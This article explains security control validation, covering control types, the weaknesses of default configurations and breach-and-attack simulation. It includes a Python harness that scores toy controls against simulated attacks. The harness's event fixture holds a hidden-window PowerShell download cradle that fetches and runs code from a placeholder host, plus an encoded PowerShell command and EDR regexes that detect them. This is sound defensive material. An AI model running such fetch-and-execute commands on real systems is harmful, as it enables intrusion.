Security control validation is a term that is gaining traction in the cyber community. Is it just a buzzword pushed by marketing teams, or does it have practical implications and benefits? To understand the merits of security control validation, it helps to keep in mind how the IT landscape and cyber threats have changed over the past few years, shares Yoni Leitersdof, US CTO at Cymulate.
On the IT front, a lot has happened. Agile development, with frequent deployments that change systems, infrastructure and network connections; the massive and unplanned migration to working from home during COVID; rapid and widespread cloud adoption; and increased reliance on third-party vendors, from open-source code snippets to productivity and operational applications, are the main elements that, in less than a decade, have dramatically expanded the attack surface.
On the threat landscape side, the cybercriminal toolkit has become more professional. Malicious actors now have access to a range of off-the-shelf hacking tools that let people with limited programming skills launch effective automated attacks, and nation-state-grade tooling finds its way onto the shelves of dark-net markets. Geopolitical tensions between China and Taiwan, North Korea's bellicose posture, and the conflict between Ukraine and Russia are the most glaring potential sources of direct attacks on nation states.
In short, the classic detect-and-respond defensive posture that was adequate until just a few years ago now requires additional capabilities.
The second thing to keep in mind is that not all breaches are equal. Technically, any unauthorized adversarial access to a system qualifies as a breach, yet the cost and impact of a breach vary widely, from a minor inconvenience to a major disaster that can result in business shutdown, infrastructure damage and even personal injury.
What stands between the former and the latter are the security controls, the elements of any environment that do the most to limit the damage a breach can cause.
What are security controls?
The U.S. National Institute of Standards and Technology (NIST) defines a security control as: "A prescribed safeguard or countermeasure for an information system or organization designed to protect the confidentiality, integrity, and availability of its information and to meet a set of defined security requirements."
There are five types of security controls:
- Preventive: all the measures and solutions intended to block or stop attempts at malicious intrusion or propagation on the network.
- Detective: all the measures and solutions designed to identify and report attempted or active malicious activity.
- Corrective: all the measures and solutions designed to contain an attack once it has started and keep it from spreading.
- Deterrent: all the measures and solutions intended to discourage attackers.
- Compensating: all the measures taken as an alternative when primary controls are not feasible.
In practice, these cover firewalls, antivirus, security gateways, network segmentation, access and privilege policy management, and so on. The US Center for Internet Security (CIS) defines 18 Critical Security Controls that organizations are encouraged to implement.
The problem with security controls
All of these security controls must be configured to match the organization’s requirements in order to work as intended. No two organizations are the same, and the level of risk appetite, methods of collecting and accessing data, digital infrastructure, compliance requirements, etc. of each organization are different. Yet the tendency to opt for a plug-and-play attitude when adding new security controls is common. Additionally, vendor default configurations are rarely, if ever, tailored to the specifics of the user’s environment.
What makes things worse, as Trend Micro Research shows, is that organizations run an average of 29 security control solutions, each with hundreds of settings that need to be revisited every time a new deployment takes place.
The lack of time and resources leads to non-optimized configurations, which can have dramatic consequences.
Loosely configured controls may fail to detect attempted or in-progress attacks, because default configurations are generally designed for operational flexibility rather than tight security. An attacker can then take advantage of that slack to gain a foothold, spread undetected or unhindered through the network, and reach their objective. Conversely, over-broad configurations produce a flood of false alarms, which leads to alert fatigue and ultimately weakens the security posture.
So, with limited resources and time constraints, how can a security team streamline the configuration process and focus on what matters most? Security teams need to know precisely which controls are most likely to let an attacker succeed, in other words where the real security gaps are, and security control validation does just that.
How to validate security controls
Validating security controls means running complete sets of simulated attacks, behaving like an attacker but without causing harm, and measuring how effectively the security controls stop them.
In other words, it shifts attention from reacting to attackers and hoping to stop them in time, to proactively imitating them and shutting down access points and propagation routes before attackers can use them for nefarious purposes. Just as sports teams practice constantly to succeed in their games, security teams must exercise their controls and processes to make sure they prevent and detect malicious behavior.
The classic method of validating security controls was penetration testing. While penetration testing is still a valuable tool, its use is much more limited than before, because it is not suited to today's fluid environments, infrastructure and threat landscape. Because of their cost and their interference with regular operations, penetration tests can only be run periodically, typically once or twice a year, and at the current pace of change their results are quickly outdated.
Gartner's recent publication on the Continuous Threat Exposure Management (CTEM) framework and its five-step program recommends continuously planning, monitoring and reducing risk using validation technologies that trigger prioritized remediation based on business context, so that leaders understand the exposure and commit to fixing it.
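To make the two points above concrete (loose default configurations leaving gaps, and validation as the way to find them by simulating attacks and scoring the controls), here is a small breach-and-attack-simulation style harness. It is an added example written for this page, not Cymulate's product or any vendor's code. Everything in it is an assumption: the simulated attack events and benign activity are constructed, the three "controls" (an EDR rule, a web proxy blocklist and a segmentation policy) are toy models, and the technique labels are ATT&CK-style strings chosen for illustration. The harness runs every simulated event through the control stack, scores each as prevented, detected or missed, computes coverage per kill-chain stage, counts false positives on benign activity, and lists the gaps earliest stage first; it then repeats the run with a tuned EDR rule so the effect of tuning is measurable.

```python
"""Minimal BAS-style validation harness (constructed example, not vendor code).

The simulated events, the benign activity and the three toy control models
below are illustrative assumptions; the technique labels are ATT&CK-style.
"""
from dataclasses import dataclass
import re

STAGE_ORDER = ["execution", "command-and-control", "lateral-movement"]
# EDR rule as shipped (assumption): only encoded PowerShell is flagged.
DEFAULT_EDR = r"powershell(\.exe)?\s.*-enc(odedcommand)?\b"
# Same rule after tuning: also catch hidden-window download cradles.
TUNED_EDR = DEFAULT_EDR + r"|DownloadString|-w(indowstyle)?\s+hidden"


@dataclass(frozen=True)
class Event:
    name: str
    stage: str
    technique: str
    malicious: bool   # False for benign activity, used to count false alarms
    data: dict


def make_controls(edr_pattern=DEFAULT_EDR, blocklist=frozenset({"bad.example"}),
                  allowed_ports=frozenset({80, 443})):
    """Return (name, fn) pairs; each fn yields 'prevented', 'detected' or None."""
    def edr(ev):
        cmd = ev.data.get("cmdline", "")
        return "detected" if re.search(edr_pattern, cmd, re.I) else None

    def proxy(ev):
        return "prevented" if ev.data.get("dst_host") in blocklist else None

    def segmentation(ev):
        port = ev.data.get("dst_port")
        return "prevented" if port is not None and port not in allowed_ports else None

    return [("EDR", edr), ("Proxy", proxy), ("Segmentation", segmentation)]


def run_validation(events, controls=None):
    """Score a control stack against simulated events.

    Per event: prevented beats detected beats missed. Coverage is computed per
    stage over the malicious events; benign events that trigger any control are
    false positives; gaps are the missed malicious events, earliest stage first,
    so the control that would stop the attack soonest gets tuned first.
    """
    controls = controls or make_controls()
    outcomes = {}
    for ev in events:
        fired = {v for _, fn in controls if (v := fn(ev))}
        outcomes[ev.name] = ("prevented" if "prevented" in fired
                             else "detected" if fired else "missed")
    malicious = [ev for ev in events if ev.malicious]
    benign = [ev for ev in events if not ev.malicious]
    coverage = {}
    for stage in STAGE_ORDER:
        in_stage = [ev for ev in malicious if ev.stage == stage]
        if in_stage:
            hit = sum(outcomes[ev.name] != "missed" for ev in in_stage)
            coverage[stage] = hit / len(in_stage)
    false_positives = [ev.name for ev in benign if outcomes[ev.name] != "missed"]
    gaps = sorted((ev for ev in malicious if outcomes[ev.name] == "missed"),
                  key=lambda ev: STAGE_ORDER.index(ev.stage))
    return {"outcomes": outcomes, "coverage_by_stage": coverage,
            "false_positives": false_positives,
            "false_positive_rate": len(false_positives) / len(benign) if benign else 0.0,
            "gaps": [(ev.stage, ev.technique, ev.name) for ev in gaps]}


# Constructed simulation set: five malicious actions and two benign ones.
SIMULATED_EVENTS = [
    Event("encoded powershell", "execution", "T1059.001", True,
          {"cmdline": "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"}),
    Event("download cradle", "execution", "T1059.001", True,
          {"cmdline": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                      ".DownloadString('http://cdn.example/a')\""}),
    Event("beacon to listed c2", "command-and-control", "T1071.001", True,
          {"dst_host": "bad.example", "dst_port": 443}),
    Event("beacon to unlisted c2", "command-and-control", "T1071.001", True,
          {"dst_host": "cdn.example", "dst_port": 443}),
    Event("smb lateral movement", "lateral-movement", "T1021.002", True,
          {"dst_host": "fileserver.corp.example", "dst_port": 445}),
    Event("admin rdp session", "lateral-movement", "benign", False,
          {"dst_host": "jump.corp.example", "dst_port": 3389}),
    Event("scheduled backup script", "execution", "benign", False,
          {"cmdline": "powershell.exe -File C:\\ops\\backup.ps1"}),
]

if __name__ == "__main__":
    for label, pattern in (("default EDR rule", DEFAULT_EDR), ("tuned EDR rule", TUNED_EDR)):
        r = run_validation(SIMULATED_EVENTS, make_controls(pattern))
        print(label, {s: f"{c:.0%}" for s, c in r["coverage_by_stage"].items()},
              f"FP rate {r['false_positive_rate']:.0%}", "gaps:", [g[2] for g in r["gaps"]])
```

With the default rule the execution stage scores 50% (the unencoded download cradle is missed) and command-and-control scores 50% (the beacon to a host not on the blocklist passes), while the segmentation policy blocks the simulated SMB move but also blocks the benign admin RDP session, which the harness reports as a false positive. Tuning the EDR pattern closes the execution gap without changing the false-positive rate, which is exactly the kind of before-and-after measurement validation is meant to give: the remaining gap (the unlisted C2 host) is the next item to fix, and the RDP false positive is the operational cost to weigh before tightening further.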
Depending on the extent of validation an organization requires, current security control validation solutions range from Breach and Attack Simulation (BAS), which only verifies internal security controls, to extended security posture management platforms that combine BAS with other capabilities such as phishing awareness, external attack surface management, automated red teaming and purple-team exercises, all under a single dashboard.
So, security control validation is a buzzword for a very good reason. Without validation, security controls can no longer fulfill their function of minimizing the damage caused by breaches. The difference between adding security controls and validating them is the difference between estimating the correct configuration of security controls and hoping for the best, and actually knowing what that configuration is and tuning the controls for optimal security coverage.